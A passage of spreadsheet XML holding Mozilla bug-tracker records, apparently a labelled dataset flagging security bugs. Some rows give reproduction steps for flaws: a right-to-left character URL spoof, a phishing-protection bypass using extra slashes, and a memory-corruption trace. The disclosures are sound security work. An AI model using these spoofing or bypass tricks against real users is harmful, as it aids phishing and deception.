          <t>2015-07-06 10:24:26 -0700</t>
        </is>
      </c>
      <c r="C4982" t="inlineStr">
        <is>
          <t>Stop resetting the client id on FHR opt-out</t>
        </is>
      </c>
      <c r="D4982" t="inlineStr">
        <is>
          <t>2018-10-11 13:43:22 -0700</t>
        </is>
      </c>
      <c r="E4982" t="n">
        <v>1</v>
      </c>
      <c r="F4982" t="n">
        <v>1</v>
      </c>
      <c r="G4982" t="n">
        <v>6</v>
      </c>
      <c r="H4982" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4982" t="inlineStr">
        <is>
          <t>Firefox Health Report Graveyard</t>
        </is>
      </c>
      <c r="J4982" t="inlineStr">
        <is>
          <t>Client: Desktop</t>
        </is>
      </c>
      <c r="K4982" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4982" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4982" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4982" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4982" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4982" t="inlineStr">
        <is>
          <t>[rC] [unifiedTelemetry] [uplift3]</t>
        </is>
      </c>
      <c r="Q4982" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4982" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4982" t="inlineStr">
        <is>
          <t>Firefox 42</t>
        </is>
      </c>
      <c r="T4982" t="n">
        <v>1</v>
      </c>
      <c r="U4982" t="n">
        <v>0</v>
      </c>
      <c r="V4982" t="n">
        <v>13</v>
      </c>
      <c r="W4982" t="inlineStr">
        <is>
          <t>With the system changes for unified Telemetry, we won't reset the client id anymore.
This change is reasonable privacy-wise as we already persist historical ping data with the client id on disk.
Now, if/while we hold back unified Telemetry from release, we should avoid corner-case and data inconsistencies by stopping FHR/DRS to reset the saved client id.</t>
        </is>
      </c>
      <c r="X4982" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4983">
      <c r="A4983" t="n">
        <v>583331</v>
      </c>
      <c r="B4983" t="inlineStr">
        <is>
          <t>2010-07-30 13:27:49 -0700</t>
        </is>
      </c>
      <c r="C4983" t="inlineStr">
        <is>
          <t>[k] Unicode characters in question title =&gt; "An Error Occurred"</t>
        </is>
      </c>
      <c r="D4983" t="inlineStr">
        <is>
          <t>2010-07-30 14:55:46 -0700</t>
        </is>
      </c>
      <c r="E4983" t="n">
        <v>1</v>
      </c>
      <c r="F4983" t="n">
        <v>1</v>
      </c>
      <c r="G4983" t="n">
        <v>5</v>
      </c>
      <c r="H4983" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4983" t="inlineStr">
        <is>
          <t>support.mozilla.org</t>
        </is>
      </c>
      <c r="J4983" t="inlineStr">
        <is>
          <t>Questions</t>
        </is>
      </c>
      <c r="K4983" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4983" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4983" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4983" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4983" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4983" t="inlineStr"/>
      <c r="Q4983" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4983" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4983" t="inlineStr">
        <is>
          <t>2.2</t>
        </is>
      </c>
      <c r="T4983" t="n">
        <v>1</v>
      </c>
      <c r="U4983" t="n">
        <v>0</v>
      </c>
      <c r="V4983" t="n">
        <v>5</v>
      </c>
      <c r="W4983" t="inlineStr">
        <is>
          <t>The code that generates the confirmation_id doesn't like the unicode.</t>
        </is>
      </c>
      <c r="X4983" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4984">
      <c r="A4984" t="n">
        <v>1623888</v>
      </c>
      <c r="B4984" t="inlineStr">
        <is>
          <t>2020-03-20 06:37:29 -0700</t>
        </is>
      </c>
      <c r="C4984" t="inlineStr">
        <is>
          <t>URL spoof: RTL character in URL flips domain and path if domain contains no directional characters (e.g. ip address)</t>
        </is>
      </c>
      <c r="D4984" t="inlineStr">
        <is>
          <t>2024-05-30 10:12:44 -0700</t>
        </is>
      </c>
      <c r="E4984" t="n">
        <v>1</v>
      </c>
      <c r="F4984" t="n">
        <v>1</v>
      </c>
      <c r="G4984" t="n">
        <v>2</v>
      </c>
      <c r="H4984" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I4984" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J4984" t="inlineStr">
        <is>
          <t>Address Bar</t>
        </is>
      </c>
      <c r="K4984" t="inlineStr">
        <is>
          <t>74 Branch</t>
        </is>
      </c>
      <c r="L4984" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4984" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4984" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4984" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4984" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main77+]</t>
        </is>
      </c>
      <c r="Q4984" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R4984" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4984" t="inlineStr">
        <is>
          <t>Firefox 77</t>
        </is>
      </c>
      <c r="T4984" t="n">
        <v>1</v>
      </c>
      <c r="U4984" t="n">
        <v>0</v>
      </c>
      <c r="V4984" t="n">
        <v>44</v>
      </c>
      <c r="W4984" t="inlineStr">
        <is>
          <t>Created attachment 9134657
URL Spoofing.png
User Agent: Mozilla/5.0 (Windows NT 6.1; rv:74.0) Gecko/20100101 Firefox/74.0
Steps to reproduce:
1) Post the following link in the status bar: 127.0.0.1/ا/http://attack.com
Actual results:
You would notice that the URL has been flipped from Right to left and the status bar dispays http://attack.com/‭ا/127.0.0.1 while it displays the content from the IP address.
Expected results:
Ip address should be shown first.</t>
        </is>
      </c>
      <c r="X4984" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4985">
      <c r="A4985" t="n">
        <v>574750</v>
      </c>
      <c r="B4985" t="inlineStr">
        <is>
          <t>2010-06-25 11:50:01 -0700</t>
        </is>
      </c>
      <c r="C4985" t="inlineStr">
        <is>
          <t>Code that iterates through nsCSSValue::Arrays should use size_t for index now</t>
        </is>
      </c>
      <c r="D4985" t="inlineStr">
        <is>
          <t>2010-09-27 18:02:58 -0700</t>
        </is>
      </c>
      <c r="E4985" t="n">
        <v>1</v>
      </c>
      <c r="F4985" t="n">
        <v>1</v>
      </c>
      <c r="G4985" t="n">
        <v>3</v>
      </c>
      <c r="H4985" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4985" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4985" t="inlineStr">
        <is>
          <t>CSS Parsing and Computation</t>
        </is>
      </c>
      <c r="K4985" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4985" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4985" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4985" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4985" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4985" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q4985" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4985" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4985" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4985" t="n">
        <v>1</v>
      </c>
      <c r="U4985" t="n">
        <v>0</v>
      </c>
      <c r="V4985" t="n">
        <v>12</v>
      </c>
      <c r="W4985" t="inlineStr">
        <is>
          <t>Now that Bug 574059 landed and nsCSSValue::Array::Count() returns a size_t (instead of PRUint16), we need to do a s/PRUint16/size_t/ on code that iterates through these arrays, too.
e.g.
278     nsCSSValue::Array *array = aValue.GetArrayValue();
[...]
330     for (PRUint16 index = 1; index &lt; array-&gt;Count(); ++index) {
331       AppendCSSValueToString(aProperty, array-&gt;Item(index), aResult);
332 
333       /* If we're not at the final element, append a comma. */
334       if (index + 1 != array-&gt;Count())
335         aResult.AppendLiteral(", ");
336     }
http://mxr.mozilla.org/mozilla-central/source/layout/style/nsCSSDeclaration.cpp</t>
        </is>
      </c>
      <c r="X4985" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4986">
      <c r="A4986" t="n">
        <v>523370</v>
      </c>
      <c r="B4986" t="inlineStr">
        <is>
          <t>2009-10-20 08:51:51 -0700</t>
        </is>
      </c>
      <c r="C4986" t="inlineStr">
        <is>
          <t>bogus OOM with empty double free lists</t>
        </is>
      </c>
      <c r="D4986" t="inlineStr">
        <is>
          <t>2009-10-29 14:26:10 -0700</t>
        </is>
      </c>
      <c r="E4986" t="n">
        <v>1</v>
      </c>
      <c r="F4986" t="n">
        <v>1</v>
      </c>
      <c r="G4986" t="n">
        <v>3</v>
      </c>
      <c r="H4986" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4986" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4986" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4986" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4986" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4986" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4986" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4986" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4986" t="inlineStr">
        <is>
          <t>fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q4986" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4986" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4986" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T4986" t="n">
        <v>1</v>
      </c>
      <c r="U4986" t="n">
        <v>0</v>
      </c>
      <c r="V4986" t="n">
        <v>14</v>
      </c>
      <c r="W4986" t="inlineStr">
        <is>
          <t>With changes from the bug 504797 jstracer.cpp NativeToValueBase contains:
            if (JS_THREAD_DATA(cx)-&gt;gcFreeLists.doubles) {
...
                js_NewDoubleInRootedValue(cx, d, &amp;v);
            JS_ASSERT(ok);
            return true;
        }
        return E::handleDoubleOOM(cx, d, v);
This implies that when E is FailDoubleOOMHandler an empty double free list will be treated as OOM error. This is not correct since an empty free list just means that a particular GC arena is exhausted, not that it is impossible to find or allocate more GC arenas.</t>
        </is>
      </c>
      <c r="X4986" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4987">
      <c r="A4987" t="n">
        <v>945731</v>
      </c>
      <c r="B4987" t="inlineStr">
        <is>
          <t>2013-12-03 07:07:32 -0800</t>
        </is>
      </c>
      <c r="C4987" t="inlineStr">
        <is>
          <t>Update responsive layout for MDN homepage</t>
        </is>
      </c>
      <c r="D4987" t="inlineStr">
        <is>
          <t>2020-05-15 11:41:36 -0700</t>
        </is>
      </c>
      <c r="E4987" t="n">
        <v>1</v>
      </c>
      <c r="F4987" t="n">
        <v>1</v>
      </c>
      <c r="G4987" t="n">
        <v>6</v>
      </c>
      <c r="H4987" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I4987" t="inlineStr">
        <is>
          <t>developer.mozilla.org Graveyard</t>
        </is>
      </c>
      <c r="J4987" t="inlineStr">
        <is>
          <t>Design</t>
        </is>
      </c>
      <c r="K4987" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4987" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4987" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="N4987" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4987" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4987" t="inlineStr">
        <is>
          <t>[specification][type:bug]</t>
        </is>
      </c>
      <c r="Q4987" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4987" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S4987" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4987" t="n">
        <v>1</v>
      </c>
      <c r="U4987" t="n">
        <v>0</v>
      </c>
      <c r="V4987" t="n">
        <v>9</v>
      </c>
      <c r="W4987" t="inlineStr">
        <is>
          <t>What did you do?
================
1. 
2. 
3. 
What happened?
==============
Responsive layout is working, but content below search field requires users to scroll excessively in order to reach valuable content. 
What should have happened?
==========================
Responsive layout should be designed so that we can get valuable content higher on the page and more accessible for mobile users (I'm focusing on handset, not tablet), reduce scrolling in order to view all content, and generally make the page it more usable.
Is there anything else we should know?
======================================
For instance, Hack blogs, demos, and these 3 blocks (http://cl.ly/image/380r2l2P460I) take up a lot of space.
Solutions (I can sketch out a wireframe if necessary when I have more time)
- reduce font size or omit headline altogether for small viewport size. 
- only show latest hacks post + link to hacks. (or multiple and swipe left to right to see more)
- only show one demo at a time and swipe left to right to see more
- reduce size of these 3 blocks and/or have a slimmer height to them (http://cl.ly/image/1W1A0m0U2913)</t>
        </is>
      </c>
      <c r="X4987" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4988">
      <c r="A4988" t="n">
        <v>367538</v>
      </c>
      <c r="B4988" t="inlineStr">
        <is>
          <t>2007-01-19 14:14:02 -0800</t>
        </is>
      </c>
      <c r="C4988" t="inlineStr">
        <is>
          <t>Firefox Phishing Protection bypass</t>
        </is>
      </c>
      <c r="D4988" t="inlineStr">
        <is>
          <t>2014-05-27 12:25:31 -0700</t>
        </is>
      </c>
      <c r="E4988" t="n">
        <v>1</v>
      </c>
      <c r="F4988" t="n">
        <v>1</v>
      </c>
      <c r="G4988" t="n">
        <v>3</v>
      </c>
      <c r="H4988" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4988" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J4988" t="inlineStr">
        <is>
          <t>Safe Browsing</t>
        </is>
      </c>
      <c r="K4988" t="inlineStr">
        <is>
          <t>2.0 Branch</t>
        </is>
      </c>
      <c r="L4988" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4988" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4988" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4988" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4988" t="inlineStr"/>
      <c r="Q4988" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R4988" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4988" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4988" t="n">
        <v>1</v>
      </c>
      <c r="U4988" t="n">
        <v>0</v>
      </c>
      <c r="V4988" t="n">
        <v>39</v>
      </c>
      <c r="W4988" t="inlineStr">
        <is>
          <t>User-Agent:       Opera/9.10 (X11; Linux i686; U; en)
Build Identifier: 2.0.0.1 for Linux and 2.0.0.1 for Windows XP
It is possible to bypass Phishing Protection by add some characters to URL address. URL will be still valid and will work properly but we are not aware of Phishing warning. 
When we add "/" char at the end of domain in URL field - for Phishing Protection it will be another site than original and Phishing Protection Test will fail. Example: When my URL is on Phishing List: http://kaneda.bohater.net/phish.html - warning will be displayed 
http://kaneda.bohater.net//phish.html - warning will NOT be displayed 
Of course we can add more "/". 
Like live shows [Firefox HexEncoding Anti-Phishing bypass URL: http://sla.ckers.org/forum/read.php?13,2253 ] Phishers can use this technique in near future to abusive actions.
Reproducible: Always
Steps to Reproduce:
1. Open url with more /// in URL address which is added to Phishing BlackList
2.
3.
Actual Results:  
FireFox dosnt display AntiPhishing warning.
Expected Results:  
Its should display AntiPhishing warning</t>
        </is>
      </c>
      <c r="X4988" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4989">
      <c r="A4989" t="n">
        <v>1616467</v>
      </c>
      <c r="B4989" t="inlineStr">
        <is>
          <t>2020-02-18 21:26:58 -0800</t>
        </is>
      </c>
      <c r="C4989" t="inlineStr">
        <is>
          <t>No such file or directory: '..\.mozbuild\moz-phab\moz-phab.log' after a new install</t>
        </is>
      </c>
      <c r="D4989" t="inlineStr">
        <is>
          <t>2020-02-19 06:25:23 -0800</t>
        </is>
      </c>
      <c r="E4989" t="n">
        <v>1</v>
      </c>
      <c r="F4989" t="n">
        <v>1</v>
      </c>
      <c r="G4989" t="n">
        <v>7</v>
      </c>
      <c r="H4989" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I4989" t="inlineStr">
        <is>
          <t>Conduit</t>
        </is>
      </c>
      <c r="J4989" t="inlineStr">
        <is>
          <t>moz-phab</t>
        </is>
      </c>
      <c r="K4989" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4989" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4989" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4989" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4989" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4989" t="inlineStr"/>
      <c r="Q4989" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4989" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4989" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4989" t="n">
        <v>1</v>
      </c>
      <c r="U4989" t="n">
        <v>0</v>
      </c>
      <c r="V4989" t="n">
        <v>6</v>
      </c>
      <c r="W4989" t="inlineStr">
        <is>
          <t>&gt; Just FYI: I applied this locally and used it rather than jump through the hoops on a Windows 10 laptop. The install worked for me too! However:
```
nalexander@DESKTOP-MH5FQH9 /c/Mozilla/gecko
$ moz-phab install-certificate
FileNotFoundError: [Errno 2] No such file or directory: 'c:\\Users\\nalexander\\.mozbuild\\moz-phab\\moz-phab.log'
Run moz-phab again with '--trace' to show the stack trace
Sentry is attempting to send 0 pending error messages
Waiting up to 2 seconds
Press Ctrl-Break to quit
```
I can reproduce this on osx - remove the `~/.mozbuild/moz-phab` directory and run `moz-phab`.</t>
        </is>
      </c>
      <c r="X4989" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4990">
      <c r="A4990" t="n">
        <v>454113</v>
      </c>
      <c r="B4990" t="inlineStr">
        <is>
          <t>2008-09-07 16:15:14 -0700</t>
        </is>
      </c>
      <c r="C4990" t="inlineStr">
        <is>
          <t>e4x/extensions/regress-374025.js - invalid write</t>
        </is>
      </c>
      <c r="D4990" t="inlineStr">
        <is>
          <t>2014-10-11 15:11:21 -0700</t>
        </is>
      </c>
      <c r="E4990" t="n">
        <v>1</v>
      </c>
      <c r="F4990" t="n">
        <v>1</v>
      </c>
      <c r="G4990" t="n">
        <v>3</v>
      </c>
      <c r="H4990" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4990" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4990" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K4990" t="inlineStr">
        <is>
          <t>1.8 Branch</t>
        </is>
      </c>
      <c r="L4990" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4990" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4990" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4990" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4990" t="inlineStr">
        <is>
          <t>[sg:critical]</t>
        </is>
      </c>
      <c r="Q4990" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4990" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4990" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4990" t="n">
        <v>1</v>
      </c>
      <c r="U4990" t="n">
        <v>0</v>
      </c>
      <c r="V4990" t="n">
        <v>20</v>
      </c>
      <c r="W4990" t="inlineStr">
        <is>
          <t>This is fixed on the trunk and is a known crasher on 1.8.1, but I just realized it is a security issue.
==30135== Invalid write of size 2
==30135==    at 0x40D6CA4: js_RepeatChar (jsscan.c:845)
==30135==    by 0x40F5597: XMLToXMLString (jsxml.c:2709)
==30135==    by 0x40F6246: XMLToXMLString (jsxml.c:3004)
==30135==    by 0x40F6624: ToXMLString (jsxml.c:3082)
==30135==    by 0x4102289: xml_toXMLString (jsxml.c:7168)
==30135==    by 0x406B298: js_Invoke (jsinterp.c:1387)
==30135==    by 0x406B6CB: js_InternalInvoke (jsinterp.c:1481)
==30135==    by 0x40A78ED: js_TryMethod (jsobj.c:4686)
==30135==    by 0x40E8B98: js_ValueToSource (jsstr.c:2718)
==30135==    by 0x40E1CA2: str_uneval (jsstr.c:470)
==30135==    by 0x406B298: js_Invoke (jsinterp.c:1387)
==30135==    by 0x407E78D: js_Interpret (jsinterp.c:3964)</t>
        </is>
      </c>
      <c r="X4990" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4991">
      <c r="A4991" t="n">
        <v>642348</v>
      </c>
      <c r="B4991" t="inlineStr">
        <is>
          <t>2011-03-16 18:47:11 -0700</t>
        </is>
      </c>
      <c r="C4991" t="inlineStr">
        <is>
          <t>WebifyMe - Document Goals and Measurements</t>
        </is>
      </c>
      <c r="D4991" t="inlineStr">
        <is>
          <t>2011-11-24 07:08:49 -0800</t>
        </is>
      </c>
      <c r="E4991" t="n">
        <v>1</v>
      </c>
      <c r="F4991" t="n">
        <v>1</v>
      </c>
      <c r="G4991" t="n">
        <v>5</v>
      </c>
      <c r="H4991" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4991" t="inlineStr">
        <is>
          <t>Websites</t>
        </is>
      </c>
      <c r="J4991" t="inlineStr">
        <is>
          <t>webifyme.org</t>
        </is>
      </c>
      <c r="K4991" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4991" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4991" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4991" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4991" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4991" t="inlineStr"/>
      <c r="Q4991" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4991" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4991" t="inlineStr">
        <is>
          <t>1.0</t>
        </is>
      </c>
      <c r="T4991" t="n">
        <v>1</v>
      </c>
      <c r="U4991" t="n">
        <v>0</v>
      </c>
      <c r="V4991" t="n">
        <v>14</v>
      </c>
      <c r="W4991" t="inlineStr">
        <is>
          <t>Before the WebifyMe campaign launches, let's document how we will measure the campaign.
* What are the goals for this campaign?
* How do we plan to measure this campaign?
* How will we determine whether this campaign was a success?
* When do we need to schedule a post-mortem for this project?</t>
        </is>
      </c>
      <c r="X4991" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4992">
      <c r="A4992" t="n">
        <v>638652</v>
      </c>
      <c r="B4992" t="inlineStr">
        <is>
          <t>2011-03-03 17:34:14 -0800</t>
        </is>
      </c>
      <c r="C4992" t="inlineStr">
        <is>
          <t>[Fx4Launch] make sure the What's New page mirrors the content on First Run</t>
        </is>
      </c>
      <c r="D4992" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E4992" t="n">
        <v>1</v>
      </c>
      <c r="F4992" t="n">
        <v>1</v>
      </c>
      <c r="G4992" t="n">
        <v>5</v>
      </c>
      <c r="H4992" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I4992" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J4992" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K4992" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4992" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M4992" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N4992" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4992" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4992" t="inlineStr"/>
      <c r="Q4992" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4992" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4992" t="inlineStr">
        <is>
          <t>1.4</t>
        </is>
      </c>
      <c r="T4992" t="n">
        <v>1</v>
      </c>
      <c r="U4992" t="n">
        <v>0</v>
      </c>
      <c r="V4992" t="n">
        <v>4</v>
      </c>
      <c r="W4992" t="inlineStr">
        <is>
          <t>For the initial launch period, we'd like visitors to the What's New page to see the same content as First Run, the thought being that everyone who gets Fx4 should have a new product, First Run-type experience.
I posed a question to Steven about this over email and he suggested:
"I would suggest we keep the URLs as is and use a PHP include on the server-side. This will avoid any new re-write/URL tomfoolery, avoid maintaining two versions of the code, and only takes one line of PHP.
The entire contents of the /whatsnew/index.html file would look something like this:
&lt;? include($config['file_root'].'/'.$lang.'/firefox/4.0/firstrun/index.html')?&gt;"
So, hopefully that solution works but I'm filing this bug to track. Also, James &amp; Anthony, please weigh in with your thoughts if you have any.
Thanks!</t>
        </is>
      </c>
      <c r="X4992" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4993">
      <c r="A4993" t="n">
        <v>1148732</v>
      </c>
      <c r="B4993" t="inlineStr">
        <is>
          <t>2015-03-28 02:59:37 -0700</t>
        </is>
      </c>
      <c r="C4993" t="inlineStr">
        <is>
          <t>feed: protocol + POST method =&gt; mixed scripting</t>
        </is>
      </c>
      <c r="D4993" t="inlineStr">
        <is>
          <t>2017-02-09 08:37:17 -0800</t>
        </is>
      </c>
      <c r="E4993" t="n">
        <v>1</v>
      </c>
      <c r="F4993" t="n">
        <v>1</v>
      </c>
      <c r="G4993" t="n">
        <v>3</v>
      </c>
      <c r="H4993" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4993" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4993" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K4993" t="inlineStr">
        <is>
          <t>36 Branch</t>
        </is>
      </c>
      <c r="L4993" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4993" t="inlineStr">
        <is>
          <t>Windows 8</t>
        </is>
      </c>
      <c r="N4993" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4993" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4993" t="inlineStr">
        <is>
          <t>[keep hidden while 1272171 is][adv-main40+], [domsecurity-active][post-critsmash-triage][adv-main50-]</t>
        </is>
      </c>
      <c r="Q4993" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4993" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4993" t="inlineStr">
        <is>
          <t>mozilla40</t>
        </is>
      </c>
      <c r="T4993" t="n">
        <v>1</v>
      </c>
      <c r="U4993" t="n">
        <v>0</v>
      </c>
      <c r="V4993" t="n">
        <v>43</v>
      </c>
      <c r="W4993" t="inlineStr">
        <is>
          <t>Created attachment 8585005
PoC.html
User Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Build ID: 20150320202338
Steps to reproduce:
Using feed: protocol and POST method, Firefox does not block mixed scripting.
Actual results:
Firefox does not block mixed scripting.
Expected results:
Mixed scripting should be blocked.</t>
        </is>
      </c>
      <c r="X4993" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4994">
      <c r="A4994" t="n">
        <v>701259</v>
      </c>
      <c r="B4994" t="inlineStr">
        <is>
          <t>2011-11-09 18:09:48 -0800</t>
        </is>
      </c>
      <c r="C4994" t="inlineStr">
        <is>
          <t>crashes on videos when scaling to large width/height</t>
        </is>
      </c>
      <c r="D4994" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:49 -0700</t>
        </is>
      </c>
      <c r="E4994" t="n">
        <v>1</v>
      </c>
